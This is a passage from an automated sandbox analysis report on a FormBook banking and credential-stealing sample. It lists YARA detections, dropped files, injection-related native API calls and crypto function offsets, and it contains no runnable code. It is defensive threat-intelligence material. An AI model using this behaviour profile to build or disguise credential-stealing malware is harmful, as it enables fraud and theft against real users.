 Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000006.00000000.884104159.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

#### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE

#### System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\wscript.exe Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.ini Jump to dropped file Source: C:\Windows\SysWOW64\wscript.exe Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrf.ini Jump to dropped file Source: C:\Windows\SysWOW64\wscript.exe Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Contains functionality to call native functions Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416BC0 NtCreateFile, 5_2_00416BC0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416C70 NtReadFile, 5_2_00416C70 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416CF0 NtClose, 5_2_00416CF0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416DA0 NtAllocateVirtualMemory, 5_2_00416DA0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416BBA NtCreateFile, 5_2_00416BBA Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416C6A NtReadFile, 5_2_00416C6A Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416C12 NtCreateFile, 5_2_00416C12 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00416CEA NtClose, 5_2_00416CEA Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F62EF0 NtUnmapViewOfSection, 20_2_02F62EF0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F64C41 NtUnmapViewOfSection, 20_2_02F64C41 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416BC0 NtCreateFile, 21_2_00416BC0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416C70 NtReadFile, 21_2_00416C70 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416CF0 NtClose, 21_2_00416CF0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416DA0 NtAllocateVirtualMemory, 21_2_00416DA0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416BBA NtCreateFile, 21_2_00416BBA Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416C6A NtReadFile, 21_2_00416C6A Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416C12 NtCreateFile, 21_2_00416C12 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00416CEA NtClose, 21_2_00416CEA Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA2D0 NtClose,LdrInitializeThunk, 21_2_00BBA2D0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA240 NtReadFile,LdrInitializeThunk, 21_2_00BBA240 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA3E0 NtFreeVirtualMemory,LdrInitializeThunk, 21_2_00BBA3E0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA360 NtAllocateVirtualMemory,LdrInitializeThunk, 21_2_00BBA360 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA4A0 NtUnmapViewOfSection,LdrInitializeThunk, 21_2_00BBA4A0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA480 NtMapViewOfSection,LdrInitializeThunk, 21_2_00BBA480 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA410 NtQueryInformationToken,LdrInitializeThunk, 21_2_00BBA410 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA5F0 NtReadVirtualMemory,LdrInitializeThunk, 21_2_00BBA5F0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA560 NtQuerySystemInformation,LdrInitializeThunk, 21_2_00BBA560 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA540 NtDelayExecution,LdrInitializeThunk, 21_2_00BBA540 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA6A0 NtCreateSection,LdrInitializeThunk, 21_2_00BBA6A0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA610 NtAdjustPrivilegesToken,LdrInitializeThunk, 21_2_00BBA610 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA720 NtResumeThread,LdrInitializeThunk, 21_2_00BBA720 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA700 NtProtectVirtualMemory,LdrInitializeThunk, 21_2_00BBA700 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA750 NtCreateFile,LdrInitializeThunk, 21_2_00BBA750 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBB0B0 NtGetContextThread, 21_2_00BBB0B0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA800 NtSetValueKey, 21_2_00BBA800 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA2F0 NtQueryInformationFile, 21_2_00BBA2F0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBBA30 NtSetContextThread, 21_2_00BBBA30 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA220 NtWaitForSingleObject, 21_2_00BBA220 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA260 NtWriteFile, 21_2_00BBA260 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA3D0 NtCreateKey, 21_2_00BBA3D0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA310 NtEnumerateValueKey, 21_2_00BBA310 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA370 NtQueryInformationProcess, 21_2_00BBA370 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA350 NtQueryValueKey, 21_2_00BBA350 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBACE0 NtCreateMutant, 21_2_00BBACE0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA430 NtQueryVirtualMemory, 21_2_00BBA430 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBB410 NtOpenProcessToken, 21_2_00BBB410 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA470 NtSetInformationFile, 21_2_00BBA470 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBB470 NtOpenThread, 21_2_00BBB470 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA460 NtOpenProcess, 21_2_00BBA460 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA5A0 NtWriteVirtualMemory, 21_2_00BBA5A0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA520 NtEnumerateKey, 21_2_00BBA520 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBBD40 NtSuspendThread, 21_2_00BBBD40 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA6D0 NtCreateProcessEx, 21_2_00BBA6D0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA650 NtQueueApcThread, 21_2_00BBA650 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA780 NtOpenDirectoryObject, 21_2_00BBA780 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BBA710 NtQuerySection, 21_2_00BBA710 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_1_00416BC0 NtCreateFile, 21_1_00416BC0
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F0B08 4_2_010F0B08 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F1FB0 4_2_010F1FB0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F0E98 4_2_010F0E98 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F22D8 4_2_010F22D8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F1414 4_2_010F1414 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F2051 4_2_010F2051 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F0F35 4_2_010F0F35 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_010F0EF0 4_2_010F0EF0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_004078F0 5_2_004078F0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_0041B22A 5_2_0041B22A Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_0041AB51 5_2_0041AB51 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_0041B42A 5_2_0041B42A Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_0041A4D7 5_2_0041A4D7 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00419E3C 5_2_00419E3C Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 17_2_00B7E698 17_2_00B7E698 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 17_2_00B7E688 17_2_00B7E688 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 17_2_00B7BCBC 17_2_00B7BCBC Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F622D8 20_2_02F622D8 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F60E98 20_2_02F60E98 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F61FA1 20_2_02F61FA1 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F60B08 20_2_02F60B08 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F60EF0 20_2_02F60EF0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F60F35 20_2_02F60F35 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F62051 20_2_02F62051 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 20_2_02F61414 20_2_02F61414 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_004078F0 21_2_004078F0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_0041B22A 21_2_0041B22A Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_0041AB51 21_2_0041AB51 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_0041B42A 21_2_0041B42A Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_0041A4D7 21_2_0041A4D7 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00419E3C 21_2_00419E3C Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C428E8 21_2_00C428E8 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B8A080 21_2_00B8A080 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA48CB 21_2_00BA48CB Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C218B6 21_2_00C218B6 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BAE020 21_2_00BAE020 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA0021 21_2_00BA0021 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA9810 21_2_00BA9810 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA1070 21_2_00BA1070 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C3D016 21_2_00C3D016 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C361DF 21_2_00C361DF Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C419E2 21_2_00C419E2 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA6180 21_2_00BA6180 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C4D9BE 21_2_00C4D9BE Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA7110 21_2_00BA7110 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BC9906 21_2_00BC9906 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA594B 21_2_00BA594B Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B942B0 21_2_00B942B0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C422DD 21_2_00C422DD Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C41A99 21_2_00C41A99 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA523D 21_2_00BA523D Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C30A02 21_2_00C30A02 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C4E214 21_2_00C4E214 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA4A5B 21_2_00BA4A5B Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA4B96 21_2_00BA4B96 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B7EBE0 21_2_00B7EBE0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA63C2 21_2_00BA63C2 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B9FB40 21_2_00B9FB40 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C3DCC5 21_2_00C3DCC5 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C344EF 21_2_00C344EF Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C33490 21_2_00C33490 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C41C9F 21_2_00C41C9F Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C42C9A 21_2_00C42C9A Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B91410 21_2_00B91410 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B8740C 21_2_00B8740C Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA547E 21_2_00BA547E Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C2F42B 21_2_00C2F42B Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C3D5D2 21_2_00C3D5D2 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C2FDDB 21_2_00C2FDDB Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C21DE3 21_2_00C21DE3 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C3E581 21_2_00C3E581 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C1E58A 21_2_00C1E58A Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B91530 21_2_00B91530 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C31D1B 21_2_00C31D1B Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C42519 21_2_00C42519 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B70D40 21_2_00B70D40 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C1C53F 21_2_00C1C53F Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C426F8 21_2_00C426F8 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C33E96 21_2_00C33E96 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C3CE66 21_2_00C3CE66 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA6611 21_2_00BA6611 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA5E70 21_2_00BA5E70 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00BA4E61 21_2_00BA4E61 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B97640 21_2_00B97640 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C41FCE 21_2_00C41FCE Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B95790 21_2_00B95790 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C32782 21_2_00C32782 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00B767D0 21_2_00B767D0 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 21_2_00C41746 21_2_00C41746
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: String function: 00BCDDE8 appears 48 times Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: String function: 00B7B0E0 appears 176 times Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: String function: 00C05110 appears 38 times
 PE file contains strange resources Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Cookies7n1p8js.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
